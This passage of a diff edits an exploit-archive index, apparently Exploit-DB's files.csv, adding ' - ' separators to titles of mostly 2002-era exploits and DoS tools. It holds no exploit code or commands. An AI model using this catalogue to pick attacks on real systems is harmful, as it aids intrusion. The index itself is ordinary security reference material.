rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",irix,remote,0 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0 -21573,platforms/cgi/webapps/21573.txt,"YaBB 1 Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0 +21573,platforms/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0 21574,platforms/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",unix,remote,0 21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x - Off-By-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - EXT.DLL Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0 @@ -18858,7 +18858,7 @@ id,file,description,date,author,platform,type,port 21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (2)",2002-06-24,"Gobbles Security",unix,remote,0 21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0 21581,platforms/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 URLCount.CGI HTML Injection",2002-06-27,"Matthew Murphy",windows,remote,0 -21582,platforms/windows/remote/21582.txt,"Macromedia JRun 3/4 Administrative Authentication Bypass",2002-06-28,"Matt Moore",windows,remote,0 +21582,platforms/windows/remote/21582.txt,"Macromedia JRun 3/4 - Administrative Authentication Bypass",2002-06-28,"Matt Moore",windows,remote,0 21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0 21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0 21585,platforms/linux/local/21585.c,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local,0 @@ -18866,11 +18866,11 @@ id,file,description,date,author,platform,type,port 21587,platforms/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 Parserl.PL Cross-Site Scripting",2002-07-01,"Mark Rowe",cgi,webapps,0 21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote,0 -21590,platforms/php/webapps/21590.txt,"PHPAuction 1/2 Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0 +21590,platforms/php/webapps/21590.txt,"PHPAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0 21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server Directory Traversal",2002-07-06,"team n.finity",windows,remote,0 21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 Password Disclosure",2002-07-03,"Richard van den Berg",unix,local,0 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - DoS Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0 -21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 +21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,windows,remote,0 21596,platforms/osx/remote/21596.txt,"MacOS X 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote,0 @@ -18897,15 +18897,15 @@ id,file,description,date,author,platform,type,port 21618,platforms/windows/remote/21618.txt,"Mirabilis ICQ 2002 Sound Scheme Remote Configuration Modification",2002-07-15,xLaNT,windows,remote,0 21619,platforms/windows/remote/21619.txt,"AOL Instant Messenger 4.x - Unauthorized Actions",2002-07-16,orb,windows,remote,0 21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 - WinAmp Plugin Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos,0 -21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0 +21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0 21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0 21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle Unsafe eval() Code Execution",2002-07-17,"Jeff Epler",linux,local,0 21624,platforms/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x - Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local,0 21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 -21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote,0 -22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 Administrative Interface Command Execution",2002-12-05,grazer,linux,remote,0 +21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver - Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote,0 +22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 - Administrative Interface Command Execution",2002-12-05,grazer,linux,remote,0 21627,platforms/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 Information Disclosure",2002-07-18,skp,multiple,remote,0 -21628,platforms/php/webapps/21628.txt,"Geeklog 1.3.5 HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",php,webapps,0 +21628,platforms/php/webapps/21628.txt,"Geeklog 1.3.5 - HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",php,webapps,0 21629,platforms/windows/local/21629.txt,"Adobe eBook Reader 2.2 - File Restoration Privilege Escalation",2002-07-19,"Vladimir Katalov",windows,local,0 21630,platforms/windows/remote/21630.html,"Working Resources 1.7.x BadBlue - Administrative Interface Arbitrary File Access",2002-07-20,"Matthew Murphy",windows,remote,0 21631,platforms/windows/remote/21631.txt,"Microsoft Outlook Express 5/6 Spoofable File Extensions",2002-07-20,"Matthew Murphy",windows,remote,0 @@ -18922,7 +18922,7 @@ id,file,description,date,author,platform,type,port 21642,platforms/cgi/remote/21642.txt,"GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting",2002-07-24,office,cgi,remote,0 21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 SMTP Response Buffer Overflow",2002-07-24,doe,windows,remote,0 21644,platforms/unix/dos/21644.txt,"Pine 4.x - Empty MIME Boundary Denial of Service",2002-07-24,"Martin J. Muench",unix,dos,0 -21645,platforms/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 Crash PoC",2012-10-01,coolkaveh,windows,dos,0 +21645,platforms/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 - Crash PoC",2012-10-01,coolkaveh,windows,dos,0 21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",windows,remote,0 21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 @@ -18934,15 +18934,15 @@ id,file,description,date,author,platform,type,port 21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router Long HTTP Request DoS",2002-07-27,FX,hardware,dos,0 21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M SNMP Write Denial of Service",2002-07-27,FX,hardware,dos,0 21658,platforms/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",cgi,webapps,0 -21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 +21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 -21661,platforms/php/webapps/21661.txt,"DotProject 0.2.1 User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 +21661,platforms/php/webapps/21661.txt,"DotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21665,platforms/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution",2012-10-02,"Jean Pascal Pereira",php,webapps,0 21666,platforms/linux/local/21666.txt,"soapbox 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0 21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",linux,local,0 -21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection",2002-07-29,delusion,php,webapps,0 +21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 - Form Field HTML Injection",2002-07-29,delusion,php,webapps,0 21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0 21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0 @@ -18952,7 +18952,7 @@ id,file,description,date,author,platform,type,port 21675,platforms/windows/remote/21675.pl,"Trillian 0.x - IRC Module Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0 21676,platforms/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Inclusion",2002-08-01,PowerTech,php,webapps,0 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0 -21678,platforms/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 Format String",2002-08-02,ghandi,solaris,remote,0 +21678,platforms/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,solaris,remote,0 21679,platforms/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,cgi,webapps,0 21680,platforms/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME Multipart Boundary Buffer Overflow",2002-08-05,Kanatoko,windows,remote,0 21681,platforms/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",windows,remote,0 @@ -18966,13 +18966,13 @@ id,file,description,date,author,platform,type,port 21689,platforms/windows/local/21689.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0 21690,platforms/windows/local/21690.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0 21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 -21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6_Konqueror 2.2.2/3.0_Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 -21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow",2002-08-06,"Dave Aitel",windows,remote,0 +21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6_Konqueror 2.2.2/3.0_Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 +21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow",2002-08-06,"Dave Aitel",windows,remote,0 21694,platforms/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy Localhost Denial of Service",2002-08-03,"Stan Bubrouski",windows,dos,0 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (1)",2002-08-08,"Paul Szabo",windows,remote,0 21696,platforms/windows/remote/21696.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (2)",2002-08-08,"Paul Szabo",windows,remote,0 21697,platforms/windows/remote/21697.txt,"Apache 2.0 Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",windows,remote,0 -21698,platforms/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",windows,remote,0 +21698,platforms/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",windows,remote,0 21699,platforms/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",hardware,remote,0 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0 @@ -18992,7 +18992,7 @@ id,file,description,date,author,platform,type,port 21716,platforms/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP HCP URI Handler Abuse",2002-08-15,"Shane Hird",windows,remote,0 21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Elevation",2002-08-15,"David Litchfield",windows,remote,0 -21719,platforms/windows/remote/21719.txt,"Apache 2.0 Path Disclosure",2002-08-16,"Auriemma Luigi",windows,remote,0 +21719,platforms/windows/remote/21719.txt,"Apache 2.0 - Path Disclosure",2002-08-16,"Auriemma Luigi",windows,remote,0 21720,platforms/irix/local/21720.txt,"SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing",2002-08-16,"Michael Wardle",irix,local,0 21721,platforms/windows/local/21721.html,"Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure",2002-08-17,Jelmer,windows,local,0 21722,platforms/linux/remote/21722.pl,"Lynx 2.8.x - Command Line URL CRLF Injection",2002-08-19,"Ulf Harnhammar",linux,remote,0 @@ -19003,12 +19003,12 @@ id,file,description,date,author,platform,type,port 21727,platforms/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution",2002-08-19,"Joao Gouveia",php,webapps,0 21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 -21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 +21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",linux,local,0 21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack",2002-06-28,"Charles Stevenson",linux,local,0 21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting",2002-08-21,Skinnay,unix,remote,0 -21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 +21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 @@ -19040,7 +19040,7 @@ id,file,description,date,author,platform,type,port 21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 Excel 2002 INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0 21765,platforms/linux/remote/21765.pl,"Webmin 0.x - RPC Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0 21766,platforms/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injection",2002-08-31,"Matthew Murphy",asp,webapps,0 -21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0 +21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0 21768,platforms/cgi/webapps/21768.txt,"Super Site Searcher Remote Command Execution",2002-09-03,luca.ercoli,cgi,webapps,0 21769,platforms/cgi/webapps/21769.txt,"Aestiva HTML/OS 2.4 - Cross-Site Scripting",2002-09-03,eax@3xT.org,cgi,webapps,0 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0 @@ -19053,7 +19053,7 @@ id,file,description,date,author,platform,type,port 21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0 21778,platforms/php/webapps/21778.txt,"phpGB 1.x - SQL Injection",2002-09-09,ppp-design,php,webapps,0 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps,0 -21780,platforms/php/webapps/21780.txt,"phpGB 1.1 HTML Injection",2002-09-09,ppp-design,php,webapps,0 +21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 21781,platforms/windows/local/21781.c,"Trillian Instant Messaging 0.x - Credential Encryption Weakness",2002-09-09,"Coeus Group",windows,local,0 21782,platforms/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos,0 21783,platforms/php/webapps/21783.txt,"phpGB 1.1/1.2 PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 @@ -19062,13 +19062,13 @@ id,file,description,date,author,platform,type,port 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ authenticate Local Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 -21792,platforms/windows/dos/21792.txt,"Savant Webserver 3.1 Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 +21792,platforms/windows/dos/21792.txt,"Savant Webserver 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 21793,platforms/linux/local/21793.txt,"BRU 17.0 XBRU Insecure Temporary File",2002-09-13,prophecy,linux,local,0 21794,platforms/windows/remote/21794.txt,"Savant Webserver 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",windows,remote,0 21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 21796,platforms/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 21797,platforms/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 -21798,platforms/freebsd/local/21798.txt,"WMMon 1.0 b2 Memory Character File Open File Descriptor Read",2002-09-16,badc0ded,freebsd,local,0 +21798,platforms/freebsd/local/21798.txt,"WMMon 1.0 b2 - Memory Character File Open File Descriptor Read",2002-09-16,badc0ded,freebsd,local,0 21799,platforms/freebsd/local/21799.txt,"WMNet2 1.0 6 Kernel Memory File Descriptor Leakage",2002-09-16,badc0ded,freebsd,local,0 21800,platforms/multiple/remote/21800.txt,"DB4Web 3.4/3.6 - File Disclosure",2002-09-17,"Stefan Bagdohn",multiple,remote,0 21801,platforms/multiple/remote/21801.txt,"DB4Web 3.4/3.6 Connection Proxy",2002-09-17,"Stefan Bagdohn",multiple,remote,0 @@ -19104,7 +19104,7 @@ id,file,description,date,author,platform,type,port 21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow PoC",2012-10-09,Dark-Puzzle,windows,dos,0 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 -21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection",2002-09-24,das@hush.com,php,webapps,0 +21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 @@ -19132,11 +19132,11 @@ id,file,description,date,author,platform,type,port 21857,platforms/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 - File Disclosure",2002-09-25,DownBload,linux,remote,0 21858,platforms/linux/remote/21858.txt,"ACWeb 1.14/1.8 - Cross-Site Scripting",2002-09-25,DownBload,linux,remote,0 21859,platforms/php/webapps/21859.txt,"PHP-Nuke 6.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 -21860,platforms/php/webapps/21860.txt,"NPDS 4.8 News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 -21861,platforms/php/webapps/21861.txt,"DaCode 1.2 News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 +21860,platforms/php/webapps/21860.txt,"NPDS 4.8 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 +21861,platforms/php/webapps/21861.txt,"DaCode 1.2 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21862,platforms/php/webapps/21862.txt,"PHP-Nuke 6.0 - Modules.php SQL Injection",2002-09-25,"Pedro Inacio",php,webapps,0 -21863,platforms/php/webapps/21863.txt,"Drupal 4.0 News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 -21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 +21863,platforms/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 +21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps,0 21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 @@ -19189,7 +19189,7 @@ id,file,description,date,author,platform,type,port 21922,platforms/windows/local/21922.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 21923,platforms/windows/local/21923.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 MsgError.ASP Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps,0 -21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps,0 +21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 - User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 @@ -19203,12 +19203,12 @@ id,file,description,date,author,platform,type,port 21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - Log() Function Buffer Overflow",2002-10-07,flea,linux,remote,0 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebServer 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos,0 -21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 +21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 Reversible Password Hash Weakness",2002-10-15,"Brian Enigma",multiple,remote,0 21943,platforms/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",windows,dos,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 -21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 +21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 21946,platforms/java/webapps/21946.txt,"VBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,java,webapps,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0 @@ -19218,13 +19218,13 @@ id,file,description,date,author,platform,type,port 